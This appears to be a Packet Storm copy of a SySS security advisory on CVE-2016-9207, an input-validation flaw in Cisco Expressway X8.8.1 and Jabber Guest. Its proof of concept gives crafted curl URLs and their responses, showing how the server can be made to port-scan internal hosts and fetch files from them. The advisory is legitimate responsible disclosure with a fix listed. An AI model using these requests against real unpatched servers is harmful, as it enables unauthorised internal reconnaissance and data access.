what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco Expressway 8.8.1 Internal Scanning

Cisco Expressway 8.8.1 Internal Scanning
Posted Dec 17, 2016
Authored by Micha Borrmann | Site syss.de

Cisco Expressway version 8.8.1 suffers from an access control bypass that allows an attacker to leverage the application for internal port scanning.

tags | exploit
systems | cisco
SHA-256 | a361dfbad67cdbc85d866b203c31e7071f2f67698c9fe8627ebe4531801d3757

Cisco Expressway 8.8.1 Internal Scanning

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID: SYSS-2016-115
Product: Expressway
Manufacturer: Cisco
Affected Version(s): below X8.9
Tested Version(s): X8.8.1
Vulnerability Type: Improper Input Validation (CWE-20)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2016-11-10
Solution Date: 2016-12-05
Public Disclosure: 2016-12-14
CVE Reference: CVE-2016-9207
Author of Advisory: Micha Borrmann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Jabber Guest [1] can be used to connect people from the Internet with
enterprise workers using video calls within a web browser.

Due to improper input validation, it is possible by using specially
crafted URLs to perform port scans from the used video communication
server (VCS) [2] of any system which can be reached by it, usually
internal servers. It is also possible to perform denial-of-service
attacks against the VCS by downloading large files.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

A part of the URL is a host name (usually the internal Jabber Guest
server) which will be connected from the EXP-C [3] which acts like a
web proxy, if /jabberc/rest/calls/ is appended to the first "directory".
With a colon (:), it is also possible to specify a target TCP port.
Therefore, anybody, for example an external attacker, can abuse the web-based
application to connect to target systems. If the system is a web
server, it also possible to download files from it.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

This HTTP GET requests connects to the SSH server on localhost:

$ curl --include https://jabberguest.company.com/127.0.0.1:22/jabberc/rest/calls/index.txt
HTTP/1.1 200 Connection Established
Server: nginx/1.6.2
Date: Fri, 11 Nov 2016 12:14:20 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Age: 0

SSH-2.0-OpenSSH_6.6 PKIX
Protocol mismatch.

It can be confirmed, that no SMTP service is running on localhost (very simple port scan):

$ curl --include https://jabberguest.company.com/127.0.0.1:25/jabberc/rest/calls/index.txt
HTTP/1.1 502 Connection refused
Server: nginx/1.6.2
Date: Fri, 11 Nov 2016 12:22:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 253
Connection: keep-alive
Cache-Control: no-store
Content-Language: en
Age: 0

<HTML>
<HEAD>
<TITLE>Could Not Connect</TITLE>
</HEAD>

<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Could Not Connect</H1>
<HR>

<FONT FACE="Helvetica,Arial"><B>
Description: Could not connect to the server "<EM>127.0.0.1</EM>".
</B></FONT>
<HR>
</BODY>

Connections to other servers are possible, too:

$ curl --include https://jabberguest.company.com/172.27.14.74:22/jabberc/rest/calls/index.txt
HTTP/1.1 200 Connection Established
Server: nginx/1.6.2
Date: Fri, 11 Nov 2016 12:13:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Age: 0

SSH-2.0-OpenSSH_6.2_hpn13v11 FreeBSD-20130515
Protocol mismatch.

If a web server contains files within the directory structure
/jabberc/rest/calls/, they can be downloaded via the Jabber Guest via
EXP-E via EXP-C. For demonstration purposes, there was a simple text
file placed at such directory (on a Microsoft Server system which can
also be identified):

$ curl --include https://jabberguest.company.com/172.27.14.12/jabberc/rest/calls/index.txt
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 27 Oct 2016 12:21:08 GMT
Accept-Ranges: bytes
ETag: "78c1c7984c30d21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 10 Nov 2016 09:28:15 GMT
Content-Length: 7
Age: 0
Connection: keep-alive

hallo

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to software version 8.9

More Information:
https://software.cisco.com/download/release.html?mdfid=286255326&flowid=77866&softwareid=280886992&release=X8.9&relind=AVAILABLE&rellifecycle=&reltype=latest

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-10-27: Vulnerability discovered
2016-11-10: Vulnerability reported to manufacturer
2016-12-05: Patch released by manufacturer
2016-12-07: Public disclosure of vulnerability by manufacturer [4]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Jabber Guest
http://www.cisco.com/c/en/us/products/unified-communications/jabber-guest/index.html
[2] Product website for Video Communication Server (VCS)
http://www.cisco.com/c/en/us/products/unified-communications/telepresence-video-communication-server-vcs/index.html
[3] Product website for Expressway
http://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html
[4] Cisco Security Advisory: Cisco Expressway Series Software Security Bypass Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161207-expressway
[5] SySS Security Advisory SYSS-2016-115
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-115.txt
[6] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key ID: 0xEDBE26E714EA58760
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlhRQsIACgkQ7b4m5xTq
WHbgng//Xk5ZUqAtc7U47JlqoOzAd/luGgRQF3UXPVCjyFncRi13HuQjd7vZccyw
8SlwCpACHeLSnB6vcCqkG2FVIbmnQWyWjF1ZFQsvLNbAZGHc+IfG9wGm1W10oL1r
+GLvjA/edwG+L0ifga0Mpw051N1/22/mAz77ISyuJ89x5pjzGD583WKdlCF7E/Z9
yZpMILpTfLH1+pIsCHYNtnUhToQbUAquPrXxp4iQxM5mK16/0Aa+lNLHYKCA0zz0
idnBKbepYTpB562hoJERegMfVfMmrIZteyrOVPHILJOwOoCkLIZCSx9gBG7cnImz
Pwe9XAzvA/oJZIrbOozi+0L4ANdhAWVcXpj6YCvRObJ56iXT4sK733iuIaGyB5Ur
vTUGCI5+ASi8hKmJdX0n2mGj57UjOskahH3BACIgxM6X4AfPfAxCFstBBRdx0w8Z
jd3/RqvH0hfVuwPowClaGjwvuEFGGTMFo8sd0JaYLiqnTustvHNMJlfmjXJ2paXy
bDHQ1aIdxyAqsCNjTL+jyE+jhM5kHLGLFUmtR8DWpBoNfM73BwxAHmLb0ypTWLQv
yqS9n1E24VJjkcv6r0i6qY0grU6RddUKXoC5gDlcvY/kQhnNHHqBHJC8veIRcMj4
U3E6NkU+Q6iCATkBqWxSPKkvmtdbYmo0M85djq3yxEUUthVFQWw=
=LH5U
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close